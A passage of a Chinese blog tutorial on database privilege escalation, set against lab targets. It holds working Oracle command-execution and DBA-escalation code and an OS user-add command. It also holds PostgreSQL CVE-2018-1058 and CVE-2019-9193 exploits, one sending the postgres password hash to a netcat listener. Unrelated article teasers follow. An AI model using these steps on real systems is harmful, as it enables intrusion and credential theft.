             POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
        
             CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission',
        
         'writeFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;
        
             BEGIN
        
             OPEN C1;
        
             FETCH C1 BULK COLLECT INTO POL;
        
             CLOSE C1;
        
             DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
        
             END;
        
            /
        
          DECLARE
        
             POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
        
             CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission',
        
         'readFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;
        
             BEGIN
        
             OPEN C1;
        
             FETCH C1 BULK COLLECT INTO POL;
        
             CLOSE C1;
        
             DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
        
             END;
        
            /
        
  2. 执行任意命令

    1. 复现
      1. 创建java包

        1. select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
      2. 获取java权限

        1. select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<all>'''',''''EXECUTE'''');end;''commit;end;') from dual;
      3. 创建执行命令函数

        1.  select dbms_xmlquery.newcontext('declar
           e PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
          
      4. 执行命令select LinxRUNCMD('whoami') from dual;

  3. 通过注入存储过程提权(低权限提升至DBA)

    1. 原理
      1. SYS创建的存储过程存在sql注入。拥有create procedure权限的用户通过创建提权函数,将提权函数注入到存储过程中,于是该存储过程将调用这个提权函数来执行grant dba to quan命令,获得Oracle数据库dba权限
    2. 利用条件
      1. SYS创建的存储过程存在sql注入(EG:CVE-2005-4832)
      2. 用户拥有create procedure权限(用来创建函数)
    3. 复现
      1. 创建一个java class然后用procedure包装进行调用

        1.  create or replace and resolve java source named JAVACMD as
          
               import java.lang.*;
          
               import java.io.*;
          
               public class JAVACMD
          
               {
          
                  public static void execmd(String command) throws IOException
          
                  {
          
                          Runtime.getRuntime().exec(command);
          
                  }
          
              }
          
              /
          
      2. 创建调用的包

        1.  create or replace procedure MYJAVACMD(command in varchar) as language java
          
          
          
               name 'JAVACMD.execmd(java.lang.String)';
          
           /
          
      3. 执行命令

        1.  EXEC MYJAVACMD('net user cong cong /add');
          
      4. image

PostgreSQl提权

  1. 介绍

    1. PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。
  2. 复现

    1. 创建函数提权
      1. 介绍

        1. PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作
      2. 靶场:vulhub postgres/CVE-2018-1058

      3. 用普通用户连接数据库,psql --host 192.168.72.130 --username vulhub(vulhub/vulhub)

      4. 执行以下语句即可(注意更换监听ip与端口)

        1.  CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
               select dblink_connect((select 'hostaddr=192.168.1.7 port=1234 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
               SELECT pg_catalog.array_to_string($1,$2);
           $$ LANGUAGE SQL VOLATILE;
          
      5. 监听端口nc -lvvp 1234

      6. 模仿超级管理员使用ps_dump命令:docker_compose exec postgres pg_dump -U postgres -f evil.bak vulhub,后门被触发

        1. image
    2. 高权限提权
      1. 介绍
        1. PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令
      2. 影响版本
        1. 9.3-11.2
      3. 复现
        1. 靶场:vulfocus postgresql 命令执行 (cve-2019-9193)123.58.224.8:31404 31404:5432

        2. 连接postgres/postgres数据库

        3. 删除一个可能存在的函数DROP TABLE IF EXISTS cmd_exec

          1. image
        4. 创建执行命令CREATE TABLE cmd_exec(cmd_output text);

          1. image
        5. 执行系统命令COPY cmd_exec FROM PROGRAM 'whoami'

          1. image
        6. 将结果显示出来SELECT * FROM cmd_exec

          1. image

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2154166.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

HTML-DOM模型

1.DOM模型 window对象下的document对象就是DOM模型。 DOM描绘了一个层次化的节点树&#xff0c;每一个节点就是一个html标签&#xff0c;而且每一个节点也是一个DOM对象。 2.操作DOM 2.1.获取DOM对象常用方法 获取DOM对象的常用方法有如下几种&#xff1a; getElementById(…

Linux入门学习:Git

文章目录 1. 创建仓库2. 仓库克隆3. 上传文件4. 相关问题4.1 git进程阻塞4.2 git log4.3 上传的三个步骤在做什么4.4 配置邮箱/用户名 本文介绍如何在Linux操作系统下简单使用git&#xff0c;对自己的代码进行云端保存。 1. 创建仓库 &#x1f539;这里演示gitee的仓库创建。…

Linux 基础IO 1

文件操作 基础IO 在程序中若需要读取文件数据或者将数据永久存入需要使用文件因为程序的产生的数据都是在内存中的&#xff0c;只要关闭程序就会释放掉不会&#xff0c;所以在一些程序中我们难免需要对文件进程操作。无论我们是存入数据还是提取数据前提是有这个数据并清楚它…

VGG16模型实现新冠肺炎图片多分类

1. 项目简介 本项目的目标是通过深度学习模型VGG16&#xff0c;实现对新冠肺炎图像的多分类任务&#xff0c;以帮助医疗人员对患者的影像进行快速、准确的诊断。新冠肺炎自爆发以来&#xff0c;利用医学影像如X光和CT扫描进行疾病诊断已成为重要手段之一。随着数据量的增加&am…

联想(lenovo) 小新Pro13锐龙版(新机整理、查看硬件配置和系统版本、无线网络问题、windows可选功能)

新机整理 小新pro13win10新机整理 查看硬件配置和系统版本 设置-》系统-》系统信息 无线网络问题 部分热点可以&#xff0c;部分不可以 问题&#xff1a;是因为自己修改了WLAN的IP分配方式为手动分配&#xff0c;导致只能在连接家里无线网的时候可以&#xff0c;连接其他…

51单片机——独立按键

一、独立按键对应单片机P3管脚&#xff0c;如图 二、按键点亮LED灯 #include <STC89C5xRC.H> void main() { while(1) { if(P300) { P200; } else { P201; } } } 当按键为0时&#xff0c;代表按下&#xff0c;所以当P30按下时&#xff0c;让P20&#xff1d;0&#…

Java面试篇基础部分-ReentrantLock详解

ReentrantLock 是继承了Lock接口,并且实现了再接口中定义的方法,属于一个可重入的独占锁。ReentrantLock 通过自定义队列同步器(Abstract Queued Synchroinzed,AQS)来实现锁的获取与释放。   那么什么是独占锁呢?独占锁就是指这个锁在同一时刻只能被一个线程所获取到,…

2024年最新网络协议分析器Wireshark抓包详细教程(更新中)

网络协议分析器 Wireshark 安装 Wireshark 是一个功能强大的网络协议分析器&#xff0c;早期叫作 Ethereal。它主要用于捕获网络数据包&#xff0c;并对这些数据包进行详细的解析和分析&#xff0c;帮助用户深入了解网络通信的细节。它支持多种网络协议&#xff0c;并提供详细…

VM虚拟机下载以及激活

传统的官网已经找不到下载了&#xff0c;这里我将下载好的放在阿里云盘&#xff0c;百度云盘太慢了&#xff0c;懂得都得 阿里云盘分享 下载好了后会是一个exe文件&#xff0c;直接双击运行就可 下载无脑下一步即可&#xff0c;这里不做介绍 下载好了后&#xff0c;需要密钥这里…

如何搭建IP代理池:从零开始的详细指南

在网络应用中&#xff0c;IP代理池是一种非常实用的工具&#xff0c;尤其是在需要大量IP地址进行网络请求时&#xff0c;例如网络爬虫、数据抓取和分布式系统等。通过搭建IP代理池&#xff0c;你可以有效地管理和分配IP地址&#xff0c;避免单一IP地址被封锁&#xff0c;提高网…

高效编程的利器 Jupyter Notebook

目录 前言1. Jupyter Notebook简介1.1 功能特点1.2 使用场景 2. 不同编程工具的对比与效率提升2.1 VS Code&#xff1a;灵活且轻量的代码编辑器2.2 PyCharm&#xff1a;面向专业开发者的集成开发环境2.3 Git&#xff1a;高效协作的版本控制工具2.4 Jupyter Notebook 和 VS Code…

【算法题】63. 不同路径 II-力扣(LeetCode)-”如果起点有障碍物,那么便到不了终点“

【算法题】63. 不同路径 II-力扣(LeetCode)-”如果起点有障碍物&#xff0c;那么便到不了终点“ 1.题目 下方是力扣官方题目的地址 63. 不同路径 II 一个机器人位于一个 m x n 网格的左上角 &#xff08;起始点在下图中标记为 “Start” &#xff09;。 机器人每次只能向下…

【Godot4.x】Mesh相关知识总结

概述 很早之前发布过一篇关于几何体程序生成的文章&#xff0c;当时对于三角面和网格的构造其实还没有特别深入的认识&#xff0c;直到自己脑海里想到用二维数组和点更新的方式构造2D类型的多边形Mesh结构&#xff0c;也意识到在Godot中其实Mesh不仅是3D网格&#xff0c;也可以…

LeetCode 每周算法 6(图论、回溯)

LeetCode 每周算法 6&#xff08;图论、回溯&#xff09; 图论算法&#xff1a; class Solution: def dfs(self, grid: List[List[str]], r: int, c: int) -> None: """ 深度优先搜索函数&#xff0c;用于遍历并标记与当前位置(r, c)相连的所有陆地&…

uni-data-select 使用 localdata 传入数据出现 不回显 | 下拉显示错误的 解决方法

目录 1. 问题所示2. 正确Demo3. 下拉显示错误(Bug复现)4. 下拉不回显(Bug复现)1. 问题所示 uni-app的下拉框uni-data-select 使用 localdata 传入数据 主要总结正确的Demo以及复现一些Bug 数据不回显数据不显示下拉选项2. 正确Demo 详细的基本知识推荐阅读:uni-app中的…

Codeforces Round 974 (Div. 3) A-F

封面原图 画师礼島れいあ 下午的ICPC网络赛的难受一晚上全都给我打没了 手速拉满再加上秒杀线段树 这场简直了啊 唯一可惜的是最后还是掉出了1000名 一把上蓝应该没啥希望了吧 A - Robin Helps 题意 侠盗罗宾因劫富济贫而闻名于世 罗宾遇到的 n n n 人&#xff0c;从 1 s …

springMvc的初始配置

基础文件结构(toWeb插件) 1.导入对应依赖 <?xml version"1.0" encoding"UTF-8"?><project xmlns"http://maven.apache.org/POM/4.0.0" xmlns:xsi"http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation"ht…

BLE 设备丢包理解

前言 个人邮箱&#xff1a;zhangyixu02gmail.com在学习 BLE 过程中&#xff0c;总能听到 “丢包” 一词&#xff0c;但是我查阅资料又发现&#xff0c;有大佬说&#xff0c;ATT所有命令都是“必达”的&#xff0c;不存在所谓的“丢包”。而且我发现&#xff0c;在宣传 BLE 产品…

tcp、udp通信调试工具Socket Tool

tcp、udp通信调试工具Socket Tool ]

Rust 运算符快速了解

【图书介绍】《Rust编程与项目实战》-CSDN博客 《Rust编程与项目实战》(朱文伟&#xff0c;李建英)【摘要 书评 试读】- 京东图书 (jd.com) Rust编程与项目实战_夏天又到了的博客-CSDN博客 4.1 运 算 符 前面已经学习了变量和常量&#xff0c;本节开始对它们进行操作&am…